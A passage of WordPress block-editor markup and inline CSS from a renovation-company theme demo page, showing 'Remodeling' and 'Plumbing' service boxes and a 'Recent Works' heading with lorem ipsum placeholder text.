50px; padding-bottom: 50px; padding-left: 45px; padding-right: 30px; margin-top: undefinedpx; margin-bottom: 20px; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-673b41df-9cb3-42e4-aa60-44dea2983a99\" style=\"width:50%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none;background-color:rgba(255, 255, 255, 1)\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:skt-blocks/info-block {\"resheadingColor\":\"#303030\",\"ressubheadingColor\":\"#494848\",\"resheadFontFamily\":\"Poppins\",\"ressubHeadFontFamily\":\"Poppins\",\"resheadFontSize\":25,\"ressubHeadFontSize\":17,\"ressubHeadFontWeight\":\"400\",\"resheadSpace\":20,\"ressubHeadSpace\":30,\"source_type\":\"image\",\"resseperatorStyle\":\"none\",\"resctaType\":\"text\",\"resctaLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/remodeling/\",\"resctaLinkColor\":\"#303030\",\"iconTopMargin\":0,\"iconBottomMargin\":35,\"iconImage\":{\"id\":27,\"title\":\"services-img1\",\"filename\":\"services-img1.jpg\",\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/services-img1.jpg\",\"link\":\"https://sktperfectdemo.com/themepack/gbrenovate/services-img1/\",\"alt\":\"\",\"author\":\"1\",\"description\":\"\",\"caption\":\"\",\"name\":\"services-img1\",\"status\":\"inherit\",\"uploadedTo\":0,\"date\":\"2021-05-25T13:48:36.000Z\",\"modified\":\"2021-05-25T13:48:36.000Z\",\"menuOrder\":0,\"mime\":\"image/jpeg\",\"type\":\"image\",\"subtype\":\"jpeg\",\"icon\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-includes/images/media/default.png\",\"dateFormatted\":\"May 25, 2021\",\"nonces\":{\"update\":\"598bfdc22b\",\"delete\":\"5d1b940541\",\"edit\":\"0a4d84ebf2\"},\"editLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/post.php?post=27u0026action=edit\",\"meta\":false,\"authorName\":\"gbrenovation\",\"authorLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/profile.php\",\"filesizeInBytes\":3709,\"filesizeHumanReadable\":\"4 KB\",\"context\":\"\",\"height\":65,\"width\":65,\"orientation\":\"landscape\",\"sizes\":{\"full\":{\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/services-img1.jpg\",\"height\":65,\"width\":65,\"orientation\":\"landscape\"}},\"compat\":{\"item\":\"\",\"meta\":\"\"}},\"imageWidth\":65,\"resshowPrefix\":false,\"counterId\":\"877dac13-99c6-40a9-9dd5-6fca441a57f3\"} -->\n<style type=\"text/css\"> .skt-blocks-block-877dac13-99c6-40a9-9dd5-6fca441a57f3 .skt-blocks-ifb-cta-button {\n background-color: transparent; border-color: #333; }\n .skt-blocks-block-877dac13-99c6-40a9-9dd5-6fca441a57f3 .skt-blocks-ifb-cta-button .skt-blocks-inline-editing{\n color: #333; }\n .skt-blocks-block-877dac13-99c6-40a9-9dd5-6fca441a57f3 .skt-blocks-ifb-cta-button:hover {\n background-color: transparent; border-color: #333; }\n .skt-blocks-block-877dac13-99c6-40a9-9dd5-6fca441a57f3 .skt-blocks-ifb-cta-button .skt-blocks-inline-editing:hover{\n color: #333; }\n .skt-blocks-block-877dac13-99c6-40a9-9dd5-6fca441a57f3 .skt-blocks-ifb-icon svg{\n fill: #3a3a3a; }\n .skt-blocks-block-877dac13-99c6-40a9-9dd5-6fca441a57f3 .skt-blocks-ifb-icon:hover svg{\n fill: #3a3a3a; }\n .skt-blocks-block-877dac13-99c6-40a9-9dd5-6fca441a57f3 .skt-blocks-ifb-image-content img{\n opacity: 1 }\n</style><style type=\"text/css\">\n@media only screen and (min-width: 976px){\n\n.skt-blocks-block-877dac13-99c6-40a9-9dd5-6fca441a57f3.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: 25px !important; }\n .skt-blocks-block-877dac13-99c6-40a9-9dd5-6fca441a57f3.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: 17px !important; }\n .skt-blocks-block-877dac13-99c6-40a9-9dd5-6fca441a57f3 .skt-blocks-ifb-image-content img {\n width: 65px; }\n}\n\n@media only screen and (max-width: 976px){\n\n.skt-blocks-block-877dac13-99c6-40a9-9dd5-6fca441a57f3.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: undefinedpx; }\n .skt-blocks-block-877dac13-99c6-40a9-9dd5-6fca441a57f3.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: undefinedpx !important; }\n .skt-blocks-block-877dac13-99c6-40a9-9dd5-6fca441a57f3 .skt-blocks-ifb-image-content img {\n width: undefinedpx; }\n}\n\n@media only screen and (max-width: 767px){\n .skt-blocks-block-877dac13-99c6-40a9-9dd5-6fca441a57f3.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: undefinedpx; }\n .skt-blocks-block-877dac13-99c6-40a9-9dd5-6fca441a57f3.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: undefinedpx !important; }\n .skt-blocks-block-877dac13-99c6-40a9-9dd5-6fca441a57f3 .skt-blocks-ifb-image-content img {\n width: undefinedpx; }\n}\n</style><style type=\"text/css\"> .skt-blocks-block-877dac13-99c6-40a9-9dd5-6fca441a57f3.skt-blocks-infobox__content-wrap {\n text-align: center; }\n</style><div class=\"skt-blocks-infobox__outer-wrap responsive-blocks-block-team\" style=\"border-width:1px;background-color:rgba(255, 255, 255, 1);padding:0;border-style:none;box-shadow:0px 0px   undefined \"><div class=\"skt-blocks-block-877dac13-99c6-40a9-9dd5-6fca441a57f3 skt-blocks-infobox__content-wrap skt-blocks-infobox skt-blocks-infobox-has-image skt-blocks-infobox-icon-above-title skt-blocks-infobox-image-valign-top skt-blocks-infobox-enable-border-radius \"><div class=\"skt-blocks-ifb-left-right-wrap\"><div class=\"skt-blocks-ifb-content\"><div class=\"skt-blocks-ifb-image-icon-content skt-blocks-ifb-imgicon-wrap\" style=\"margin-bottom:35px;margin-top:0;margin-left:0;margin-right:0\"><div class=\"skt-blocks-ifb-image\"><div class=\"skt-blocks-ifb-image-content\"><img class=\"\" src=\"https://cteisys.com/wp-content/uploads/2021/05/services-img1.jpg\" alt=\"\" style=\"border-color:#333;border-radius:0;border-width:2px;border-style:none;box-shadow:0px 0px   undefined \"/></div></div></div><div class=\"skt-blocks-ifb-title-wrap\"><h3 class=\"skt-blocks-ifb-title\" style=\"color:#303030;font-weight:700;font-family:Poppins;margin-bottom:20px\">Remodeling</h3></div><div class=\"skt-blocks-ifb-text-wrap\"><p class=\"skt-blocks-ifb-desc\" style=\"color:#494848;font-family:Poppins;font-weight:400;margin-bottom:30px\">Posuere tellus imperdiet facilisis. Curabitur vaucibusy.</p><div class=\"skt-blocks-ifb-cta skt-blocks-infobox-cta-link-style\"><a href=\"https://sktperfectdemo.com/themepack/gbrenovate/remodeling/\" target=\"_self\" class=\"skt-blocks-infobox-cta-link\" rel=\"noopener noreferrer\" style=\"color:#303030;padding-top:10px;padding-bottom:10px;padding-left:14px;padding-right:14px\"><span class=\"skt-blocks-inline-editing\" style=\"color:#303030\">Read More</span></a></div></div></div></div></div></div>\n<!-- /wp:skt-blocks/info-block --></div></div></div>\n<!-- /wp:skt-blocks/column -->\n\n<!-- wp:skt-blocks/column {\"topPadding\":50,\"bottomPadding\":50,\"leftPadding\":45,\"rightPadding\":30,\"leftMargin\":15,\"rightMargin\":15,\"topPaddingTablet\":30,\"bottomPaddingTablet\":30,\"leftPaddingTablet\":30,\"rightPaddingTablet\":30,\"leftMarginTablet\":10,\"rightMarginTablet\":10,\"topPaddingMobile\":50,\"bottomPaddingMobile\":50,\"leftPaddingMobile\":45,\"rightPaddingMobile\":30,\"blockId\":\"b6bfc812-3413-49c0-a306-0ead7dc25f71\",\"opacity\":100,\"backgroundType\":\"color\",\"backgroundColor\":\"#ffffff\"} -->\n<style type=\"text/css\"> .block-b6bfc812-3413-49c0-a306-0ead7dc25f71 .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-b6bfc812-3413-49c0-a306-0ead7dc25f71 .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-b6bfc812-3413-49c0-a306-0ead7dc25f71 .skt-blocks-block-column{\n padding-top: 50px; padding-bottom: 50px; padding-left: 45px; padding-right: 30px; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: 15px; margin-right: 15px; }\n}\n @media only screen and (max-width: 976px){\n .block-b6bfc812-3413-49c0-a306-0ead7dc25f71 .skt-blocks-block-column{\n padding-top: 30px; padding-bottom: 30px; padding-left: 30px; padding-right: 30px; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: 10px; margin-right: 10px; }\n}\n @media only screen and (max-width: 767px){\n .block-b6bfc812-3413-49c0-a306-0ead7dc25f71 .skt-blocks-block-column{\n padding-top: 50px; padding-bottom: 50px; padding-left: 45px; padding-right: 30px; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-b6bfc812-3413-49c0-a306-0ead7dc25f71\" style=\"width:50%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none;background-color:rgba(255, 255, 255, 1)\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:skt-blocks/info-block {\"resheadingColor\":\"#303030\",\"ressubheadingColor\":\"#494848\",\"resheadFontFamily\":\"Poppins\",\"ressubHeadFontFamily\":\"Poppins\",\"resheadFontSize\":25,\"ressubHeadFontSize\":17,\"ressubHeadFontWeight\":\"400\",\"resheadSpace\":20,\"ressubHeadSpace\":30,\"source_type\":\"image\",\"resseperatorStyle\":\"none\",\"resctaType\":\"text\",\"resctaLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/plumbing/\",\"resctaLinkColor\":\"#303030\",\"iconTopMargin\":0,\"iconBottomMargin\":35,\"iconImage\":{\"id\":30,\"title\":\"services-img4\",\"filename\":\"services-img4.jpg\",\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/services-img4.jpg\",\"link\":\"https://sktperfectdemo.com/themepack/gbrenovate/services-img4/\",\"alt\":\"\",\"author\":\"1\",\"description\":\"\",\"caption\":\"\",\"name\":\"services-img4\",\"status\":\"inherit\",\"uploadedTo\":0,\"date\":\"2021-05-25T13:48:37.000Z\",\"modified\":\"2021-05-25T13:48:37.000Z\",\"menuOrder\":0,\"mime\":\"image/jpeg\",\"type\":\"image\",\"subtype\":\"jpeg\",\"icon\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-includes/images/media/default.png\",\"dateFormatted\":\"May 25, 2021\",\"nonces\":{\"update\":\"632a5a602a\",\"delete\":\"eed2430960\",\"edit\":\"f2d09a400a\"},\"editLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/post.php?post=30u0026action=edit\",\"meta\":false,\"authorName\":\"gbrenovation\",\"authorLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/profile.php\",\"filesizeInBytes\":2845,\"filesizeHumanReadable\":\"3 KB\",\"context\":\"\",\"height\":66,\"width\":57,\"orientation\":\"portrait\",\"sizes\":{\"full\":{\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/services-img4.jpg\",\"height\":66,\"width\":57,\"orientation\":\"portrait\"}},\"compat\":{\"item\":\"\",\"meta\":\"\"}},\"imageWidth\":57,\"resshowPrefix\":false,\"counterId\":\"0246a0b4-b038-4227-bbfb-f2e04361b8d2\"} -->\n<style type=\"text/css\"> .skt-blocks-block-0246a0b4-b038-4227-bbfb-f2e04361b8d2 .skt-blocks-ifb-cta-button {\n background-color: transparent; border-color: #333; }\n .skt-blocks-block-0246a0b4-b038-4227-bbfb-f2e04361b8d2 .skt-blocks-ifb-cta-button .skt-blocks-inline-editing{\n color: #333; }\n .skt-blocks-block-0246a0b4-b038-4227-bbfb-f2e04361b8d2 .skt-blocks-ifb-cta-button:hover {\n background-color: transparent; border-color: #333; }\n .skt-blocks-block-0246a0b4-b038-4227-bbfb-f2e04361b8d2 .skt-blocks-ifb-cta-button .skt-blocks-inline-editing:hover{\n color: #333; }\n .skt-blocks-block-0246a0b4-b038-4227-bbfb-f2e04361b8d2 .skt-blocks-ifb-icon svg{\n fill: #3a3a3a; }\n .skt-blocks-block-0246a0b4-b038-4227-bbfb-f2e04361b8d2 .skt-blocks-ifb-icon:hover svg{\n fill: #3a3a3a; }\n .skt-blocks-block-0246a0b4-b038-4227-bbfb-f2e04361b8d2 .skt-blocks-ifb-image-content img{\n opacity: 1 }\n</style><style type=\"text/css\">\n@media only screen and (min-width: 976px){\n\n.skt-blocks-block-0246a0b4-b038-4227-bbfb-f2e04361b8d2.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: 25px !important; }\n .skt-blocks-block-0246a0b4-b038-4227-bbfb-f2e04361b8d2.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: 17px !important; }\n .skt-blocks-block-0246a0b4-b038-4227-bbfb-f2e04361b8d2 .skt-blocks-ifb-image-content img {\n width: 57px; }\n}\n\n@media only screen and (max-width: 976px){\n\n.skt-blocks-block-0246a0b4-b038-4227-bbfb-f2e04361b8d2.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: undefinedpx; }\n .skt-blocks-block-0246a0b4-b038-4227-bbfb-f2e04361b8d2.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: undefinedpx !important; }\n .skt-blocks-block-0246a0b4-b038-4227-bbfb-f2e04361b8d2 .skt-blocks-ifb-image-content img {\n width: undefinedpx; }\n}\n\n@media only screen and (max-width: 767px){\n .skt-blocks-block-0246a0b4-b038-4227-bbfb-f2e04361b8d2.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: undefinedpx; }\n .skt-blocks-block-0246a0b4-b038-4227-bbfb-f2e04361b8d2.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: undefinedpx !important; }\n .skt-blocks-block-0246a0b4-b038-4227-bbfb-f2e04361b8d2 .skt-blocks-ifb-image-content img {\n width: undefinedpx; }\n}\n</style><style type=\"text/css\"> .skt-blocks-block-0246a0b4-b038-4227-bbfb-f2e04361b8d2.skt-blocks-infobox__content-wrap {\n text-align: center; }\n</style><div class=\"skt-blocks-infobox__outer-wrap responsive-blocks-block-team\" style=\"border-width:1px;background-color:rgba(255, 255, 255, 1);padding:0;border-style:none;box-shadow:0px 0px   undefined \"><div class=\"skt-blocks-block-0246a0b4-b038-4227-bbfb-f2e04361b8d2 skt-blocks-infobox__content-wrap skt-blocks-infobox skt-blocks-infobox-has-image skt-blocks-infobox-icon-above-title skt-blocks-infobox-image-valign-top skt-blocks-infobox-enable-border-radius \"><div class=\"skt-blocks-ifb-left-right-wrap\"><div class=\"skt-blocks-ifb-content\"><div class=\"skt-blocks-ifb-image-icon-content skt-blocks-ifb-imgicon-wrap\" style=\"margin-bottom:35px;margin-top:0;margin-left:0;margin-right:0\"><div class=\"skt-blocks-ifb-image\"><div class=\"skt-blocks-ifb-image-content\"><img class=\"\" src=\"https://cteisys.com/wp-content/uploads/2021/05/services-img4.jpg\" alt=\"\" style=\"border-color:#333;border-radius:0;border-width:2px;border-style:none;box-shadow:0px 0px   undefined \"/></div></div></div><div class=\"skt-blocks-ifb-title-wrap\"><h3 class=\"skt-blocks-ifb-title\" style=\"color:#303030;font-weight:700;font-family:Poppins;margin-bottom:20px\">Plumbing</h3></div><div class=\"skt-blocks-ifb-text-wrap\"><p class=\"skt-blocks-ifb-desc\" style=\"color:#494848;font-family:Poppins;font-weight:400;margin-bottom:30px\">Posuere tellus imperdiet facilisis. Curabitur vaucibusy.</p><div class=\"skt-blocks-ifb-cta skt-blocks-infobox-cta-link-style\"><a href=\"https://sktperfectdemo.com/themepack/gbrenovate/plumbing/\" target=\"_self\" class=\"skt-blocks-infobox-cta-link\" rel=\"noopener noreferrer\" style=\"color:#303030;padding-top:10px;padding-bottom:10px;padding-left:14px;padding-right:14px\"><span class=\"skt-blocks-inline-editing\" style=\"color:#303030\">Read More</span></a></div></div></div></div></div></div>\n<!-- /wp:skt-blocks/info-block --></div></div></div>\n<!-- /wp:skt-blocks/column --></div></div></div></div>\n<!-- /wp:skt-blocks/advance-columns --></div></section></div>\n<!-- /wp:skt-blocks/section --></div></section></div>\n<!-- /wp:skt-blocks/section -->\n\n<!-- wp:skt-blocks/section {\"contentWidth\":\"full_width\",\"blockId\":\"3b7c5c38-3c00-4a1b-aec6-158fd6d3a71c\",\"topPadding\":100,\"topPaddingMobile\":40,\"topPaddingTablet\":40,\"bottomPadding\":100,\"bottomPaddingMobile\":40,\"bottomPaddingTablet\":40,\"opacity\":100,\"colorLocation1\":68,\"colorLocation2\":44,\"backgroundColor1\":\"#072d69\",\"backgroundColor2\":\"#012257\",\"backgroundType\":\"gradient\",\"className\":\"gb-renovation-section-3\"} -->\n<div class=\"wp-block-skt-blocks-section gb-renovation-section-3 skt-blocks-block-section-outer-wrap block-3b7c5c38-3c00-4a1b-aec6-158fd6d3a71c background-type-gradient alignundefined\" style=\"z-index:1;max-width:;margin-left:;margin-right:\"><style type=\"text/css\"> @media only screen and (max-width: 976px){\n .block-3b7c5c38-3c00-4a1b-aec6-158fd6d3a71c .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 40px; padding-bottom: 40px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (max-width: 767px){\n .block-3b7c5c38-3c00-4a1b-aec6-158fd6d3a71c .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 40px; padding-bottom: 40px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (min-width: 976px){\n .block-3b7c5c38-3c00-4a1b-aec6-158fd6d3a71c .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 100px; padding-bottom: 100px; padding-left: 10px; padding-right: 10px; }\n}\n .block-3b7c5c38-3c00-4a1b-aec6-158fd6d3a71c.skt-blocks-block-section-outer-wrap.background-type-image{\n background-image: linear-gradient(rgba(255, 255, 255, 1),rgba(255, 255, 255, 1)),url(undefined); background-position: center-center; background-attachment: scroll; background-repeat: no-repeat; background-size: cover; border-radius: 0px; }\n .block-3b7c5c38-3c00-4a1b-aec6-158fd6d3a71c.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-color{\n background-color: rgba(255, 255, 255, 1); }\n .block-3b7c5c38-3c00-4a1b-aec6-158fd6d3a71c.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 1) 0%, rgba(255, 255, 255, 1) 100%); }\n .block-3b7c5c38-3c00-4a1b-aec6-158fd6d3a71c.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 1) 0%, rgba(255, 255, 255, 1) 100%); }\n .block-3b7c5c38-3c00-4a1b-aec6-158fd6d3a71c.background-type-video .skt-blocks-block-section {\n background-color: rgba(255, 255, 255, 1); }\n</style><style type=\"text/css\"> .block-3b7c5c38-3c00-4a1b-aec6-158fd6d3a71c .responsive-section-inner-wrap {\n max-width : 100%; }\n @media only screen and (min-width: 976px){\n .block-3b7c5c38-3c00-4a1b-aec6-158fd6d3a71c .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-3b7c5c38-3c00-4a1b-aec6-158fd6d3a71c.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n @media only screen and (max-width: 976px){\n .block-3b7c5c38-3c00-4a1b-aec6-158fd6d3a71c .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-3b7c5c38-3c00-4a1b-aec6-158fd6d3a71c.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n @media only screen and (max-width: 767px){\n .block-3b7c5c38-3c00-4a1b-aec6-158fd6d3a71c .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-3b7c5c38-3c00-4a1b-aec6-158fd6d3a71c.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n</style><section class=\"responsive-section-wrap skt-blocks-block-section overlay-type-color linear\" style=\"border-width:1px;border-style:none;border-radius:0;background-image:linear-gradient(90deg, rgba(7, 45, 105, 1) 68%,rgba(1, 34, 87, 1) 44%);box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-section-inner-wrap\" style=\"z-index:1\"><!-- wp:skt-blocks/advance-columns {\"topPadding\":0,\"bottomPadding\":0,\"leftPadding\":0,\"rightPadding\":0,\"opacity\":0,\"blockId\":\"8a2535a5-ba23-48dc-aa2f-8d6e2e384f43\"} -->\n<style type=\"text/css\"> .block-8a2535a5-ba23-48dc-aa2f-8d6e2e384f43 .skt-blocks-block-columns.overlay-type-color{\n background-color: rgba(255, 255, 255, 0); }\n .block-8a2535a5-ba23-48dc-aa2f-8d6e2e384f43 .skt-blocks-block-columns.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-8a2535a5-ba23-48dc-aa2f-8d6e2e384f43 .skt-blocks-block-columns.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-8a2535a5-ba23-48dc-aa2f-8d6e2e384f43 .skt-blocks-block-column{\n min-height: ; align-items: flex-start; }\n @media only screen and (min-width: 976px){\n .block-8a2535a5-ba23-48dc-aa2f-8d6e2e384f43 .skt-blocks-block-columns{\n padding-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; margin-top: 0px; margin-bottom: 0px; }\n}\n @media only screen and (max-width: 976px){\n .block-8a2535a5-ba23-48dc-aa2f-8d6e2e384f43 .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-8a2535a5-ba23-48dc-aa2f-8d6e2e384f43 .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n</style><div class=\"block-8a2535a5-ba23-48dc-aa2f-8d6e2e384f43 skt-blocks-advanced-column-outer-wrap undefined\" style=\"z-index:1\"><div class=\"skt-blocks-advanced-column alignundefined\"><div class=\"responsive-columns-wrap skt-blocks-block-columns responsive-columns__gap-default responsive-columns__stack-mobile responsive-columns__content-width-theme overlay-type-color linear\" style=\"text-align:left;border-width:1px;border-style:none;box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-columns-inner-wrap responsive-columns-columns-2\" style=\"max-width:100%\"><!-- wp:skt-blocks/column {\"width\":34,\"rightPaddingTablet\":0,\"blockId\":\"9c28eb24-8a51-4aaa-b8b9-2c2b39522605\"} -->\n<style type=\"text/css\"> .block-9c28eb24-8a51-4aaa-b8b9-2c2b39522605 .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-9c28eb24-8a51-4aaa-b8b9-2c2b39522605 .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-9c28eb24-8a51-4aaa-b8b9-2c2b39522605 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-9c28eb24-8a51-4aaa-b8b9-2c2b39522605 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: 0px; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-9c28eb24-8a51-4aaa-b8b9-2c2b39522605 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-9c28eb24-8a51-4aaa-b8b9-2c2b39522605\" style=\"width:34%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:skt-blocks/advanced-heading {\"block_id\":\"783eb3b3-d1c3-49b9-90d8-afecee322852\",\"showSeparator\":false,\"subheadSpacing\":5,\"separatorSpacing\":0,\"headingTitleFontFamily\":\"Poppins\",\"headingTitleFontSize\":19,\"headingTitleFontSizeMobile\":19,\"headingTitleFontSizeTablet\":19,\"headingTitleLetterSpacing\":1,\"headingTitleColor\":\"#ffffff\",\"subHeadingTitleFontFamily\":\"Poppins\",\"subHeadingTitleFontSize\":42,\"subHeadingTitleFontSizeMobile\":30,\"subHeadingTitleFontSizeTablet\":30,\"subHeadingTitleFontWeight\":\"700\",\"subHeadingTitleLineHeight\":1.1,\"subHeadingTitleLetterSpacing\":1,\"subHeadingTitleColor\":\"#ffffff\",\"headingAlignment\":\"left\",\"headingAlignmentTablet\":\"left\"} -->\n<style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-783eb3b3-d1c3-49b9-90d8-afecee322852 .responsive-heading-title-text {\n font-size: 19px !important; margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-783eb3b3-d1c3-49b9-90d8-afecee322852 .responsive-heading-seperator {\n margin-bottom: 0px !important; }\n\n.skt-blocks-block-advanced-heading.block-783eb3b3-d1c3-49b9-90d8-afecee322852 .responsive-heading-desc-text {\n margin-bottom: 5px !important; }\n}\n @media only screen and (min-width: 768px) and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-783eb3b3-d1c3-49b9-90d8-afecee322852 .responsive-heading-title-text {\n margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-783eb3b3-d1c3-49b9-90d8-afecee322852 .responsive-heading-seperator {\n margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-783eb3b3-d1c3-49b9-90d8-afecee322852 .responsive-heading-desc-text {\n margin-bottom: 15px !important; }\n}\n @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-783eb3b3-d1c3-49b9-90d8-afecee322852 .responsive-heading-title-text {\n margin-bottom: 15px !important; }\n .skt-blocks-block-advanced-heading.block-783eb3b3-d1c3-49b9-90d8-afecee322852 .responsive-heading-seperator {\n margin-bottom: 15px !important; }\n .skt-blocks-block-advanced-heading.block-783eb3b3-d1c3-49b9-90d8-afecee322852 .responsive-heading-desc-text {\n margin-bottom: 15px !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-783eb3b3-d1c3-49b9-90d8-afecee322852 .responsive-heading-title-text {\n font-size: 19px; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-783eb3b3-d1c3-49b9-90d8-afecee322852 .responsive-heading-title-text {\n font-size: 19px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-783eb3b3-d1c3-49b9-90d8-afecee322852 .responsive-heading-desc-text {\n font-size: 42px !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-783eb3b3-d1c3-49b9-90d8-afecee322852 .responsive-heading-desc-text {\n font-size: 30px; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-783eb3b3-d1c3-49b9-90d8-afecee322852 .responsive-heading-desc-text {\n font-size: 30px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n .skt-blocks-block-advanced-heading.block-783eb3b3-d1c3-49b9-90d8-afecee322852 {\n text-align: left; }\n}\n @media only screen and (max-width: 976px){\n .skt-blocks-block-advanced-heading.block-783eb3b3-d1c3-49b9-90d8-afecee322852 {\n text-align: left; }\n}\n @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-783eb3b3-d1c3-49b9-90d8-afecee322852 {\n text-align: center; }\n}\n</style><div class=\"skt-blocks-block-advanced-heading block-783eb3b3-d1c3-49b9-90d8-afecee322852\"><h2 class=\"responsive-heading-title-text\" style=\"font-family:Poppins;font-weight:600;line-height:1;letter-spacing:1px;color:#ffffff\">Recent Works</h2><p class=\"responsive-heading-desc-text\" style=\"font-family:Poppins;font-weight:700;line-height:1.1;letter-spacing:1px;color:#ffffff\">We take pride in our work</p></div>\n<!-- /wp:skt-blocks/advanced-heading -->\n\n<!-- wp:paragraph {\"style\":{\"typography\":{\"fontSize\":17}},\"textColor\":\"white\",\"className\":\"section-content\"} -->\n<p class=\"section-content has-white-color has-text-color\" style=\"font-size:17px\">Posuere tellus imperdiet facilisis. Curabitur vaucibusy telluseu semper nunc finibus placerat. Suspendissee potenti. Praesent vel sem in sem 